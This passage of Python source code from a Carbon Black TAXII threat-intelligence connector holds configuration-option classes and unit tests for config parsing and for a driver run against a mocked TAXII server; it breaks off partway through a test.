__all__ = ["TaxiiURLConfigOption", "ServerVersion", "ServerVersionConfigOption",
"TaxiiServerConfiguration"]
class TaxiiURLConfigOption(CommonConfigOptionBase):
@staticmethod
def taxii_url_checker(value):
matched = re.search(r"https?://\S+(:\d{1,5})?", value)
if matched is None:
raise CommonConfigException(f"Server url must match required format http(s)://<server>[:port]/taxii2")
def __init__(self):
super().__init__('url', str, bounds_checker=self.taxii_url_checker)
class ServerVersion(Enum):
V21 = 1
V20 = 0
@staticmethod
def get_server_for_version(version):
if version == ServerVersion.V20:
return ServerV20
else:
return ServerV21
@staticmethod
def from_string(str_version):
return ServerVersion[str_version.upper()]
@staticmethod
def check_string_version(str_version):
if not str_version.upper() in ["V20", "V21"]:
raise CommonConfigException(f"Version '{str_version.upper()}' "
f"not supported, supported versions are V21 and V20")
class ServerVersionConfigOption(CommonConfigOptionBase):
def __init__(self):
super().__init__('version', str, bounds_checker=ServerVersion.check_string_version, required=False,
transform=ServerVersion.from_string, allowed_values=[ServerVersion.V20, ServerVersion.V21])
class TaxiiServerConfiguration(CommonConfigBase):
"""
The class handles the configuration of a single TAXII connection stanza.
"""
DEFAULT_SCORE = 75
DEFAULT_PAGINATION = 100
PAGINATION_LOW_BOUNDS = 10
PAGINATION_HIGH_BOUNDS = 1000
# Schema definitions
config_schema = {
"cert": CertConfigOption(),
"collections": CommaDelimitedListConfigOption('collections', unique=True, required=False, default=None,
sort_list=False),
"ioc_types": CommaDelimitedListConfigOption('ioc_types', unique=True, required=False, default=None,
accepted_values=['hash', 'address', 'domain'], max_len=3),
"pagination": IntConfigOption('pagination', min_value=PAGINATION_LOW_BOUNDS, max_value=PAGINATION_HIGH_BOUNDS,
required=False, default=100),
"password": PairedConfigOption(StringConfigOption('password', required=False), 'username'),
"score": IntConfigOption('score', min_value=1, max_value=100, default=DEFAULT_SCORE),
"token": StringConfigOption("token", required=False, max_len=156, transform=TokenAuth),
"url": TaxiiURLConfigOption(),
"user": PairedConfigOption(StringConfigOption('username', required=False), 'password'),
"verify": BoolConfigOption('verify', required=False, default=None),
"version": ServerVersionConfigOption(),
}
```
#### File: cb-taxii-connector/test/test_common_config.py
```python
from unittest import TestCase, mock
from cbopensource.utilities.common_config import BoolConfigOption, CertConfigOption, CommaDelimitedListConfigOption, \
CommonConfigException, IntConfigOption, PairedConfigOption, StringConfigOption
class TestConfig(TestCase):
def test_01a_boolean_valid(self):
"""
Ensure that simple BoolConfigOption works as expected.
"""
# set of tests and expected results
checks = [("True", True), ("TRUE", True), ("true", True),
("False", False), ("FALSE", False), ("false", False)
]
problems = []
for item in checks:
try:
config = {'check': item[0]}
test = BoolConfigOption("check").parse_from_dict(config)
if item[1] != test:
problems.append(f"Value `{item[0]}` did not convert to the expected `{item[1]}`")
except CommonConfigException as err:
problems.append(f"{err}")
assert len(problems) == 0, "There were problems seen:\n " + " \n".join(problems)
def test_01b_boolean_bogus(self):
"""
Ensure that bogus boolean values are caught.
"""
try:
config = {'check': "BOGUS"}
BoolConfigOption("check").parse_from_dict(config)
self.fail("Did not trap bogus value for boolean")
except CommonConfigException as err:
assert "Only case-insensitive values of 'true' or 'false'" in str(err)
def test_01c_boolean_missing(self):
"""
By default, boolean value are required.
"""
try:
config = {}
BoolConfigOption("check").parse_from_dict(config)
self.fail("Did not trap missing value for boolean")
except CommonConfigException as err:
assert "Configuration key 'check' is required" in str(err)
def test_01d_boolean_missing_not_required_default(self):
"""
Ensure that a specified default value is used if the parameter is not suppled.
"""
config = {}
test = BoolConfigOption("check", required=False).parse_from_dict(config)
self.assertIsNone(test)
def test_01e_boolean_missing_not_required_default_specified(self):
"""
Ensure that a specified default value is used if the parameter is not suppled.
"""
config = {}
test = BoolConfigOption("check", required=False, default=True).parse_from_dict(config)
self.assertTrue(test)
def test_02a_int(self):
"""
Ensure that simple IntConfigOption works as expected.
"""
config = {"check": "42"}
test = IntConfigOption("check").parse_from_dict(config)
self.assertEqual(test, 42)
def test_02b_int_bogus(self):
"""
Ensure that bogus int values are caught.
"""
try:
config = {'check': "BOGUS"}
IntConfigOption("check").parse_from_dict(config)
self.fail("Did not trap bogus value for int")
except CommonConfigException as err:
assert "Problem with configuration key 'check': invalid literal for int()" in str(err)
def test_02c_int_bogus_float(self):
"""
Ensure that bogus int values are caught.
"""
try:
config = {'check': "4.5"}
IntConfigOption("check").parse_from_dict(config)
self.fail("Did not trap bogus value for int")
except CommonConfigException as err:
assert "roblem with configuration key 'check': invalid literal for int()" in str(err)
def test_02d_int_missing(self):
"""
By default, int value are required.
"""
try:
config = {}
IntConfigOption("check").parse_from_dict(config)
self.fail("Did not trap missing value for int")
except CommonConfigException as err:
assert "Configuration key 'check' is required" in str(err)
def test_02e_int_missing_not_required_default(self):
"""
Ensure that a specified default value is used if the parameter is not suppled.
"""
config = {}
test = IntConfigOption("check", required=False).parse_from_dict(config)
self.assertIsNone(test)
def test_02f_int_missing_not_required_default_specified(self):
"""
Ensure that a specified default value is used if the parameter is not suppled.
"""
config = {}
test = IntConfigOption("check", required=False, default=42).parse_from_dict(config)
self.assertEqual(test, 42)
def test_02g_int_at_specified_min(self):
"""
Ensure that an int at the specified min is ok.
"""
config = {'check': '3'}
test = IntConfigOption("check", min_value=3).parse_from_dict(config)
self.assertEqual(test, 3)
def test_02h_int_outside_specified_min(self):
"""
Ensure that values outside the specified minimum are trapped.
"""
try:
config = {"check": "1"}
IntConfigOption("check", min_value=10).parse_from_dict(config)
self.fail("Did not trap outside value for int")
except CommonConfigException as err:
assert "'check' must be between 10 and 100" in str(err)
def test_02i_int_at_specified_max(self):
"""
Ensure that an int at the specified max is ok.
"""
config = {'check': '90'}
test = IntConfigOption("check", max_value=90).parse_from_dict(config)
self.assertEqual(test, 90)
def test_02j_int_outside_specified_max(self):
"""
Ensure that values outside the specified maximum are trapped.
"""
try:
config = {"check": "100"}
IntConfigOption("check", max_value=95).parse_from_dict(config)
self.fail("Did not trap outside value for int")
except CommonConfigException as err:
assert "'check' must be between 0 and 95 (got 100)" in str(err)
def test_03a_string(self):
"""
Ensure that simple StringConfigOption works as expected.
"""
config = {"check": "Okay"}
test = StringConfigOption("check").parse_from_dict(config)
self.assertEqual(test, "Okay")
def test_03b_string_missing(self):
"""
By default, string value are required.
"""
try:
config = {}
StringConfigOption("check").parse_from_dict(config)
self.fail("Did not trap missing value for str")
except CommonConfigException as err:
assert "Configuration key 'check' is required" in str(err)
def test_03c_string_missing_not_required_default(self):
"""
Ensure that a specified default value is used if the parameter is not suppled.
"""
config = {}
test = StringConfigOption("check", required=False).parse_from_dict(config)
self.assertIsNone(test)
def test_03d_string_missing_not_required_default_specified(self):
"""
Ensure that a specified default value is used if the parameter is not suppled.
"""
config = {}
test = StringConfigOption("check", required=False, default="Huh?").parse_from_dict(config)
self.assertEqual(test, "Huh?")
def test_03e_string_in_allowed_values(self):
"""
Ensure that allowed values are accepted (as is).
"""
config = {"check": "Alpha"}
test = StringConfigOption("check", allowed_values=["Alpha", "Beta", "Gamma"]).parse_from_dict(config)
self.assertEqual(test, "Alpha")
def test_03f_string_in_allowed_values_bad_case(self):
"""
Ensure that allowed values are accepted (as is).
"""
config = {"check": "ALPHA"}
try:
StringConfigOption("check", allowed_values=["Alpha", "Beta", "Gamma"]).parse_from_dict(config)
self.fail("Did not trap incorrect case value for str")
except CommonConfigException as err:
assert "Configuration key 'check' must be in allowed values" in str(err)
def test_03g_string_to_upper(self):
"""
Ensure that if to_upper=True, the resulting string is uppercased.
"""
config = {"check": "Alpha"}
test = StringConfigOption("check", to_upper=True).parse_from_dict(config)
self.assertEqual(test, "ALPHA")
def test_03h_string_hidden(self):
"""
Ensure that if hidden=True, the string
"""
config = {"check": "Alpha"}
test = StringConfigOption("check", to_upper=True).parse_from_dict(config)
self.assertEqual(test, "ALPHA")
def test_03i_string_at_min_size(self):
"""
Ensure that strings at a noted minimum size are ok
"""
config = {"check": "Alpha"}
test = StringConfigOption("check", min_len=5).parse_from_dict(config)
self.assertEqual(test, "Alpha")
def test_03j_string_below_minimum_size(self):
"""
Ensure that StringConfigOption below minimum size is trapped.
"""
config = {"check": "Alpha"}
try:
StringConfigOption("check", min_len=10).parse_from_dict(config)
self.fail("Did not trap size check")
except CommonConfigException as err:
assert "'check' - String length 5 does not meet minimum length of 10" in str(err)
def test_03k_string_at_maximum_size(self):
"""
Ensure that strings at a noted maximum size are ok
"""
config = {"check": "Alpha"}
test = StringConfigOption("check", max_len=5).parse_from_dict(config)
self.assertEqual(test, "Alpha")
def test_03l_string_above_maximum_size(self):
"""
Ensure that StringConfigOption above maximum size is trapped.
"""
config = {"check": "Alpha"}
try:
StringConfigOption("check", max_len=3).parse_from_dict(config)
self.fail("Did not trap size check")
except CommonConfigException as err:
assert "'check' - String length 5 exceeds maxmimum length of 3" in str(err)
def test_03m_string__max_and_min_specified_too_small(self):
"""
Ensure that StringConfigOption outside size scope maximum size is trapped and proper message returned
when both max and min are specified
"""
config = {"check": "Alpha"}
try:
StringConfigOption("check", min_len=6, max_len=10).parse_from_dict(config)
self.fail("Did not trap size check")
except CommonConfigException as err:
assert "'check' - String length 5 not in bounds 6 -> 10" in str(err)
def test_03n_string__max_and_min_specified_too_large(self):
"""
Ensure that StringConfigOption outside size scope maximum size is trapped and proper message returned
when both max and min are specified
"""
config = {"check": "Alpha"}
try:
StringConfigOption("check", min_len=1, max_len=3).parse_from_dict(config)
self.fail("Did not trap size check")
except CommonConfigException as err:
assert "'check' - String length 5 not in bounds 1 -> 3" in str(err)
def test_04a_paired(self):
"""
Ensure that PairedConfigOption works as expected with no problems.
"""
config = {"user": "alpha", "pass": "<PASSWORD>"}
check = PairedConfigOption(StringConfigOption('user', required=False), 'pass').parse_from_dict(config)
self.assertEqual(check, "alpha")
def test_04b_paired_missing_requirment(self):
"""
Ensure that PairedConfigOption traps problems when a requirement is missing.
"""
config = {"user": "alpha"}
try:
PairedConfigOption(StringConfigOption('user', required=False), 'pass').parse_from_dict(config)
self.fail("Did not trap missing requirment")
except CommonConfigException as err:
assert "'pass' is required when 'user' is specified" in str(err)
def test_04c_paired_requirement_empty_string(self):
"""
Ensure that PairedConfigOption works as expected with no problems if the requirement is specified with an
empty string (it has been defined)
"""
config = {"user": "alpha", "pass": ""}
check = PairedConfigOption(StringConfigOption('user', required=False), 'pass').parse_from_dict(config)
self.assertEqual(check, "alpha")
def test_04d_paired_requirement_empty_string_with_required_primary(self):
"""
Ensure that PairedConfigOption works as expected with no problems if the requirement is specified with an
empty string (it has been defined)
"""
config = {"user": "alpha", "pass": ""}
check = PairedConfigOption(StringConfigOption('user', required=True), 'pass').parse_from_dict(config)
self.assertEqual(check, "alpha")
def test_04e_paired_requirement_empty_string_with_required_primary(self):
"""
Ensure that PairedConfigOption works as expected with no problems if the requirement is specified with an
empty string (it has been defined)
"""
config = {"pass": "beta"}
check = PairedConfigOption(StringConfigOption('user', required=False), 'pass').parse_from_dict(config)
self.assertIsNone(check)
def test_05a_comma_delimited(self):
"""
Ensure that CommaDelimitedListConfigOption works as expected.
"""
config = {"check": "alpha, beta, gamma, delta"}
test = CommaDelimitedListConfigOption("check").parse_from_dict(config)
self.assertListEqual(test, ['alpha', 'beta', 'delta', 'gamma'])
def test_05b_comma_delimited_no_sort(self):
"""
Ensure that CommaDelimitedListConfigOption works as expected with sorting disabled.
"""
config = {"check": "alpha, beta, gamma, delta"}
test = CommaDelimitedListConfigOption("check", sort_list=False).parse_from_dict(config)
self.assertListEqual(test, ['alpha', 'beta', 'gamma', 'delta'])
def test_05c_comma_delimited_list_minimum_size(self):
"""
Ensure that CommaDelimitedListConfigOption minimum size is ok.
"""
config = {"check": "alpha, beta, gamma"}
test = CommaDelimitedListConfigOption("check", min_len=3).parse_from_dict(config)
self.assertListEqual(test, ['alpha', 'beta', 'gamma'])
def test_05d_comma_delimited_list_below_minimum_size(self):
"""
Ensure that CommaDelimitedListConfigOption below minimum size is trapped.
"""
config = {"check": "alpha, beta, gamma"}
try:
CommaDelimitedListConfigOption("check", min_len=4).parse_from_dict(config)
self.fail("Did not trap missing requirment")
except CommonConfigException as err:
assert "'check' - List length 3 does not meet minimum length of 4" in str(err)
def test_05e_comma_delimited_list_maximum_size(self):
"""
Ensure that CommaDelimitedListConfigOption maximum size is ok.
"""
config = {"check": "alpha, beta, gamma"}
test = CommaDelimitedListConfigOption("check", max_len=3).parse_from_dict(config)
self.assertListEqual(test, ['alpha', 'beta', 'gamma'])
def test_05f_comma_delimited_list_below_minimim_size(self):
"""
Ensure that CommaDelimitedListConfigOption over maximum size is trapped.
"""
config = {"check": "alpha, beta, gamma"}
try:
CommaDelimitedListConfigOption("check", max_len=2).parse_from_dict(config)
self.fail("Did not trap missing requirment")
except CommonConfigException as err:
assert "'check' - List length 3 exceeds maxmimum length of 2" in str(err)
def test_05f_comma_delimited_max_and_min_specified_too_small(self):
"""
Ensure that CommaDelimitedListConfigOption under minimum size is trapped, and proper message when
both sizes are specified.
"""
config = {"check": "alpha, beta, gamma, delta, eta"}
try:
CommaDelimitedListConfigOption("check", min_len=10, max_len=40).parse_from_dict(config)
self.fail("Did not trap missing requirment")
except CommonConfigException as err:
assert "'check' - List length 5 not in bounds 10 -> 40" in str(err)
def test_05g_comma_delimited_max_and_min_specified_too_large(self):
"""
Ensure that CommaDelimitedListConfigOption over maximum size is trapped, and proper message when
both sizes are specified.
"""
config = {"check": "alpha, beta, gamma, delta, eta"}
try:
CommaDelimitedListConfigOption("check", min_len=1, max_len=3).parse_from_dict(config)
self.fail("Did not trap missing requirment")
except CommonConfigException as err:
assert "'check' - List length 5 not in bounds 1 -> 3" in str(err)
def test_05h_comma_delimited_list_accepted_values(self):
"""
Ensure that CommaDelimitedListConfigOption accepted values work.
"""
accepted = ['alpha', 'beta', 'gamma', 'delta']
config = {"check": "alpha, beta, gamma"}
test = CommaDelimitedListConfigOption("check", accepted_values=accepted).parse_from_dict(config)
self.assertListEqual(test, ['alpha', 'beta', 'gamma'])
def test_05i_comma_delimited_list_accepted_values_bad_value(self):
"""
Ensure that CommaDelimitedListConfigOption over maximum size is trapped, and proper message when
both sizes are specified.
"""
accepted = ['alpha', 'beta', 'gamma', 'delta']
config = {"check": "alpha, beta, foobar"}
try:
CommaDelimitedListConfigOption("check", accepted_values=accepted).parse_from_dict(config)
self.fail("Did not trap bad entry")
except CommonConfigException as err:
assert "'check' - Acceptable values (case insensitive) are: ['alpha', 'beta', 'delta', 'gamma']" in str(err)
def test_05i_comma_delimited_validate_trim(self):
"""
Ensure that CommaDelimitedListConfigOption string entries are trimmed.
"""
config = {"check": " alpha, beta ,gamma "}
test = CommaDelimitedListConfigOption("check").parse_from_dict(config)
self.assertListEqual(test, ['alpha', 'beta', 'gamma'])
def test_05j_comma_delimited_to_upper(self):
"""
Ensure that CommaDelimitedListConfigOption with to_upper are properly uppercased.
"""
config = {"check": "alpha, beta, gamma"}
test = CommaDelimitedListConfigOption("check", to_upper=True).parse_from_dict(config)
self.assertListEqual(test, ['ALPHA', 'BETA', 'GAMMA'])
def test_05k_comma_delimited_list_unique(self):
"""
Ensure that CommaDelimitedListConfigOption unique setting is allowed.
"""
config = {"check": "alpha, beta, gamma"}
test = CommaDelimitedListConfigOption("check", unique=True).parse_from_dict(config)
self.assertListEqual(test, ['alpha', 'beta', 'gamma'])
def test_05l_comma_delimited_list_unique_with_duplicates(self):
"""
Ensure that CommaDelimitedListConfigOption with unique specified catches duplicates.
"""
config = {"check": "alpha, beta, alpha"}
try:
CommaDelimitedListConfigOption("check", unique=True).parse_from_dict(config)
self.fail("Did not trap bad entry")
except CommonConfigException as err:
assert "'check' - List entries must be unique" in str(err)
def test_06a_cert_unspecified(self):
"""
Ensure that CertConfigOption allows unspecified values.
"""
config = {}
test = CertConfigOption().parse_from_dict(config)
self.assertIsNone(test)
@mock.patch("cbopensource.driver.taxii_server_config.os.path.exists")
def test_06b_cert_only_cert_path_default_key(self, os_path_exists):
"""
Ensure that CertConfigOption with single source returns cert path.
"""
os_path_exists.return_value = True
config = {"cert": "/path/to/cert.pem"}
test = CertConfigOption().parse_from_dict(config)
self.assertEqual(test, "/path/to/cert.pem")
@mock.patch("cbopensource.driver.taxii_server_config.os.path.exists")
def test_06c_cert_only_cert_path_specified_key(self, os_path_exists):
"""
Ensure that CertConfigOption with single source returns cert path.
"""
os_path_exists.return_value = True
config = {"my-cert": "/path/to/cert.pem"}
test = CertConfigOption("my-cert").parse_from_dict(config)
self.assertEqual(test, "/path/to/cert.pem")
@mock.patch("os.path.exists")
def test_06d_cert_only_cert_path_not_exists(self, os_path_exists_mock):
"""
Ensure that CertConfigOption with single source returns cert path.
"""
config = {"cert": "./does-not-exist.pem"}
os_path_exists_mock.return_value = False
try:
CertConfigOption().parse_from_dict(config)
self.fail("Did not trap missing cert")
except CommonConfigException as err:
assert "'cert' path to cert+key pair does not exist" in str(err)
@mock.patch("cbopensource.driver.taxii_server_config.os.path.exists")
def test_06e_cert_both_paths_specified(self, os_path_exists):
"""
Ensure that CertConfigOption with multiple source returns cert and key path.
"""
os_path_exists.return_value = True
config = {"cert": "/path/to/cert.pem, /path/to/key.pem"}
test = CertConfigOption("cert").parse_from_dict(config)
self.assertTupleEqual(test, ("/path/to/cert.pem", "/path/to/key.pem"))
@mock.patch("os.path.exists")
def test_06f_cert_both_paths_specified_cert_missing(self, os_path_exists_mock):
"""
Ensure that CertConfigOption with both sources traps missing cert.
"""
config = {"cert": f"./does_not_exist.py, {__file__}"}
os_path_exists_mock.return_value = False
try:
CertConfigOption().parse_from_dict(config)
self.fail("Did not trap missing cert")
except CommonConfigException as err:
assert "'cert' cert path './does_not_exist.py' does not exist!" in str(err)
@mock.patch("os.path.exists")
def test_06g_cert_both_paths_specified_key_missing(self, os_path_exists_mock):
os_path_exists_mock.side_effect = [True, False]
"""
Ensure that CertConfigOption with both sources traps missing key.
"""
config = {"cert": f"{__file__}, ./does_not_exist.py"}
try:
CertConfigOption().parse_from_dict(config)
self.fail("Did not trap missing key")
except CommonConfigException as err:
assert "'cert' key path './does_not_exist.py' does not exist!" in str(err)
def test_06h_cert_empty_string(self):
"""
Ensure that CertConfigOption with empty string is detected.
"""
config = {"cert": ""}
try:
CertConfigOption().parse_from_dict(config)
self.fail("Did not trap missing cert")
except CommonConfigException as err:
assert "'cert' must be specified as the path to a .pem encoded" in str(err)
@mock.patch("cbopensource.driver.taxii_server_config.os.path.exists")
def test_06i_cert_three_entries(self, os_path_exists):
"""
Ensure that CertConfigOption with three cert entries.
"""
os_path_exists.return_value = True
config = {"cert": "/path/to/cert.pem, /path/to/key.pem, /path/to/cert.pem"}
try:
CertConfigOption().parse_from_dict(config)
self.fail("Did not trap missing cert")
except CommonConfigException as err:
assert "'cert' must be specified as the path to a .pem encoded" in str(err)
```
#### File: cb-taxii-connector/test/test_driver.py
```python
import os
import re
import unittest
from unittest import mock
from urllib.parse import urlparse
import requests_mock
from medallion import MEDIA_TYPE_TAXII_V21
from medallion.backends.memory_backend import MemoryBackend
import os
import re
from cbopensource.driver.taxii import TaxiiDriver
from cbopensource.driver.taxii_server_config import TaxiiServerConfiguration
class MockTaxiiServer(MemoryBackend):
def __init__(self):
super().__init__(filename=f"{os.path.dirname(os.path.abspath(__file__))}/utils/mock_taxii_data.json")
@staticmethod
def process_path_to_parts(request):
path = urlparse(request.url).path
split_path = path.strip("/").split("/")
api_root = split_path[0].strip("/")
if len(split_path) >= 3:
collection_id = split_path[2].strip("/")
return api_root, collection_id
return api_root
@staticmethod
def set_content_type(context):
context.headers['Content-Type'] = MEDIA_TYPE_TAXII_V21
def handle_discovery(self, request, context):
self.set_content_type(context)
discovery_info = self._get("/discovery")
print(f"DISCOVERY IS {discovery_info}")
return discovery_info
def handle_get_api_root(self, request, context):
self.set_content_type(context)
api_root = MockTaxiiServer.process_path_to_parts(request)
return self.get_api_root_information(api_root)
def handle_get_api_root_collections(self, request, context):
self.set_content_type(context)
api_root = MockTaxiiServer.process_path_to_parts(request)
return self.get_collections(api_root)
def handle_get_api_root_collection(self, request, context):
self.set_content_type(context)
api_root, collection_id = MockTaxiiServer.process_path_to_parts(request)
return self.get_collection(api_root, collection_id=collection_id)
def handle_get_api_root_collections_objects(self, request, context):
self.set_content_type(context)
api_root, collection_id = MockTaxiiServer.process_path_to_parts(request)
limit = int(request.qs.get("limit", ['100'])[0])
request_args_as_dict = {arg: request.qs[arg][0] for arg in request.qs if arg != 'limit'}
objects, headers = self.get_objects(
api_root, collection_id, request_args_as_dict, ("id", "type", "version", "spec_version"), limit
)
context.headers.update(headers)
return objects
class _TestDriverMockedServer(unittest.TestCase):
default_settings = [{"url": "http://localhost:5000/taxii2", "username": "user", "password": "<PASSWORD>"}]
match_api_root = re.compile(r"^/\S+/$")
match_api_root_collections = re.compile(r"/\S+/collections/$")
match_api_root_collection_objects = re.compile(r"/\S+/collections/\S+/objects/")
def make_driver(self, settings=None):
if not settings:
settings = _TestDriverMockedServer.default_settings
parsed_settings = [TaxiiServerConfiguration.parse(server_settings).dict for server_settings in settings]
return TaxiiDriver(servers=parsed_settings)
def run(self, result=None):
with requests_mock.Mocker() as mocker:
mock_server = MockTaxiiServer()
mocker.get("/taxii2/", json=mock_server.handle_discovery)
mocker.get(self.match_api_root, json=mock_server.handle_get_api_root)
mocker.get(self.match_api_root_collections, json=mock_server.handle_get_api_root_collections)
mocker.get(self.match_api_root_collection_objects, json=mock_server.handle_get_api_root_collections_objects)
super(_TestDriverMockedServer, self).run(result)
def test_verify_connection(self):
driver = self.make_driver()
driver.test_connections()
def test_get_collections(self):
driver = self.make_driver()
assert len(driver.collections) > 0
def test_get_collections_constrained(self):
settings = [{"collections": "91a7b528-80eb-42ed-a74d-c6fbd5a26116", "url": "http://localhost:5000/taxii2",
"username": "user", "password": "<PASSWORD>"}]
driver = self.make_driver(settings)
assert len(driver.collections) == 1
def test_get_indicators(self):
driver = self.make_driver()
for collection in driver.collections:
for indicator in collection.stream_indicators():
assert indicator
def test_get_reports(self):
driver = self.make_driver()
reports = list(driver.generate_reports())
assert len(reports) > 0
for report in reports:
assert report is not None
assert 'title' in report
assert 'score' in report
assert report['score'] == TaxiiServerConfiguration.DEFAULT_SCORE
assert 'iocs' in report
assert 'link' in report
assert 'id' in report
def test_get_reports_score_set(self):
scored_settings = [
{"url": "http://localhost:5000/taxii2", "username": "user", "password": "<PASSWORD>", "score": '100'}]
driver = self.make_driver(scored_settings)
reports = list(driver.generate_reports())
assert len(reports) > 0
for report in reports:
assert report is not None
assert 'title' in report
assert 'score' in report
assert report['score'] == 100
assert 'iocs' in report
assert 'link' in report
assert 'id' in report
def test_get_reports_constrained_iocs_hashes(self):
settings = [
{"ioc_types": "hash", "url": "http://localhost:5000/taxii2", "username": "user", "password": "<PASSWORD>"}]
driver = self.make_driver(settings)
reports = list(driver.generate_reports())
assert len(reports) > 0
for report in reports:
assert report is not None
assert 'title' in report
assert 'score' in report
assert 'iocs' in report
assert 'md5' in report['iocs'] or 'sha256' in report['iocs']
assert 'dns' not in report['iocs']
assert 'ipv4' not in report['iocs']
assert 'ipv6' not in report['iocs']
assert 'link' in report
assert 'id' in report
def test_get_reports_constrained_iocs_addresses(self):
settings = [
{"ioc_types": "address", "url": "http://localhost:5000/taxii2", "username": "user", "password": "<PASSWORD>"}]
driver = self.make_driver(settings)
reports = list(driver.generate_reports())
assert len(reports) > 0
for report in reports:
assert report is not None
assert 'title' in report
assert 'score' in report
assert 'iocs' in report
assert 'ipv4' in report['iocs'] or 'ipv6' in report['iocs']
assert 'dns' not in report['iocs']
assert 'md5' not in report['iocs']
assert 'sha256' not in report['iocs']
assert 'link' in report
assert 'id' in report
def test_get_reports_constrained_iocs_domain(self):
settings = [
{"ioc_types": "domain", "url": "http://localhost:5000/taxii2", "username": "user", "password": "<PASSWORD>"}]
driver = self.make_driver(settings)
reports = list(driver.generate_reports())
assert len(reports) > 0
for report in reports:
assert report is not None
assert 'title' in report
assert 'score' in report
assert 'iocs' in report
assert 'ipv4' not in report['iocs']
assert 'ipv6' not in report['iocs']
assert 'dns' in report['iocs']
assert 'md5' not in report['iocs']
assert 'sha256' not in report['iocs']
assert 'link' in report
assert 'id' in report
def test_get_reports_constrained_iocs_domain_and_address(self):
settings = [
{"ioc_types": "domain,address", "url": "http://localhost:5000/taxii2", "username": "user",
"password": "<PASSWORD>"}]
driver = self.make_driver(settings)
reports = list(driver.generate_reports())
assert len(reports) > 0
for report in reports:
assert report is not None
assert 'title' in report
assert 'score' in report
assert 'iocs' in report
assert 'ipv4' in report['iocs'] or 'ipv6' in report['iocs'] or 'dns' in report['iocs']
assert 'md5' not in report['iocs']
assert 'sha256' not in report['iocs']
assert 'link' in report
assert 'id' in report
@mock.patch("cbopensource.driver.taxii.TaxiiServer.verify_connected")
@mock.patch("taxii2client.common._HTTPConnection")
@mock.patch("os.path.exists")
def test_multiple_servers(self, path_exists_mock, http_connection_mock, verify_connected):
path_exists_mock.return_value = True
settings = [{"url": "http://localhost:5000/taxii2"}, {"url": "http://localhost:5000/taxii2"}]
self.make_driver(settings)
assert len(http_connection_mock.mock_calls) == 2
"""
def test_anomali_server(self):
settings = [{"url": "https://limo.anomali.com/api/v1/taxii2/taxii/", "version": "V20", "username":"guest", "password":"<PASSWORD>"}]
driver = self.make_driver(settings)
reports = driver.generate_reports()
assert len(list(reports)) > 0"""
@mock.patch("cbopensource.driver.taxii.TaxiiServer.verify_connected")
@mock.patch("taxii2client.common._HTTPConnection")
@mock.patch("os.path.exists")
def test_certificate_support_pem(self, path_exists_mock, http_connection_mock, verify_connected):
verify_connected.return_value = True
path_exists_mock.return_value = True
settings = [{"ioc_types": "domain", "url": "http://localhost:5000/taxii2",
"username": "user", "password": "<PASSWORD>", "cert": "/path/to/cert.pem"}]
self.make_driver(settings)
http_connection_mock.assert_called_with('user', 'pass', True, None, auth=None, cert='/path/to/cert.pem',
version='2.1')
@mock.patch("cbopensource.driver.taxii.TaxiiServer.verify_connected")
@mock.patch("taxii2client.common._HTTPConnection")
@mock.patch("os.path.exists")
def test_certificate_support_cert_key_pair(self, path_exists_mock, http_connection_mock, verify_connected):
verify_connected.return_value = True
path_exists_mock.return_value = True
settings = [{"ioc_types": "domain", "url": "http://localhost:5000/taxii2",
"username": "user", "password": "<PASSWORD>", "cert": "/path/to/cert,/path/to/key"}]
self.make_driver(settings)
http_connection_mock.assert_called_with('user', 'pass', True, None, auth=None,
cert=('/path/to/cert', '/path/to/key'), version='2.1')
if __name__ == "__main__":
unittest.main()
```
#### File: cb-taxii-connector/test/test_taxii_connector_config.py
```python
from typing import Dict
from unittest import TestCase
from cbopensource.connectors.taxii.taxii_connector_config import TaxiiConnectorConfiguration
from cbopensource.utilities.common_config import CommonConfigException
class TestConnectorConfig(TestCase):
@staticmethod
def minimal() -> Dict:
"""
Create and return a config structure with everything that does not have defaults.
NOTE: All supplied values are strings, as if read from a file.
:return:
"""
kwargs = {
"carbonblack_server_token": "<PASSWORD>",
"feed_retrieval_minutes": "22",
"listener_port": "4242",
}
return kwargs
# ----- Begin Tests ------------------------------------------------------------
def test_01a_config_minimal(self):
"""
Ensure config defaults work with the minimally supplied init values.
Config settings are:
cache_path (str)
debug (bool)
feed_retrieval_minutes (int)
host_address (str)
https_proxy (str)
listener_address (str)
listen_port (int)
log_file_size (int)
log_level (str)
multi_core (bool)
pretty_print_json (bool)
server_token (str)
server_url (str)
skip_cb_sync (bool)
use_feed_stream (str)
"""
cfg = TaxiiConnectorConfiguration.parse(self.minimal())
self.assertEqual('/usr/share/cb/integrations/cb-taxii-connector/cache', cfg['cache_folder'])
self.assertFalse(cfg['debug'])
self.assertEqual(22, cfg['feed_retrieval_minutes'])
self.assertEqual('127.0.0.1', cfg['host_address'])
assert 'https_proxy' not in cfg
self.assertEqual('0.0.0.0', cfg['listener_address'])
self.assertEqual(4242, cfg['listener_port'])
self.assertEqual(10485760, cfg['log_file_size'])
self.assertEqual('INFO', cfg['log_level'])
self.assertTrue(cfg['multi_core'])
self.assertFalse(cfg['pretty_print_json'])
self.assertEqual('DEADBEEF0000000000000000CAFEBABE', cfg['carbonblack_server_token'])
self.assertEqual('https://127.0.0.1', cfg['carbonblack_server_url'])
self.assertFalse(cfg['skip_cb_sync'])
self.assertTrue(cfg['use_feed_stream'])
def test_01b_config_empty(self):
"""
If we supply nothing, ensure we get the expected number of errors.
"""
try:
TaxiiConnectorConfiguration.parse({})
self.fail("Did not get expected exception!")
except CommonConfigException as err:
assert "Configuration key 'carbonblack_server_token' is required" in str(err)
def test_02_cache_folder(self):
"""
Ensure 'cache_folder' can be defined.
"""
base = self.minimal()
base['cache_folder'] = "/usr/bin/foobar"
cfg = TaxiiConnectorConfiguration.parse(base)
self.assertEqual("/usr/bin/foobar", cfg['cache_folder'])
def test_03_debug(self):
"""
Ensure 'debug' can be defined.
"""
base = self.minimal()
base['debug'] = "true"
cfg = TaxiiConnectorConfiguration.parse(base)
self.assertEqual(True, cfg['debug'])
# NOTE: feed_retrieval_minutes part of all tests as required value
def test_04a_feed_retrieval_minutes_below_1(self):
"""
Ensure 'feed_retrieval_minutes' minimum is tracked.
"""
base = self.minimal()
base['feed_retrieval_minutes'] = "0"
try:
TaxiiConnectorConfiguration.parse(base)
self.fail("Did not get expected exception!")
except CommonConfigException as err:
assert "feed_retrieval_minutes' must be between 1 and 43200 (got 0)" in str(err)
def test_04b_feed_retrieval_minutes_above_max(self):
"""
Ensure 'feed_retrieval_minutes' minimum is tracked.
"""
base = self.minimal()
base['feed_retrieval_minutes'] = "100000"
try:
TaxiiConnectorConfiguration.parse(base)
self.fail("Did not get expected exception!")
except CommonConfigException as err:
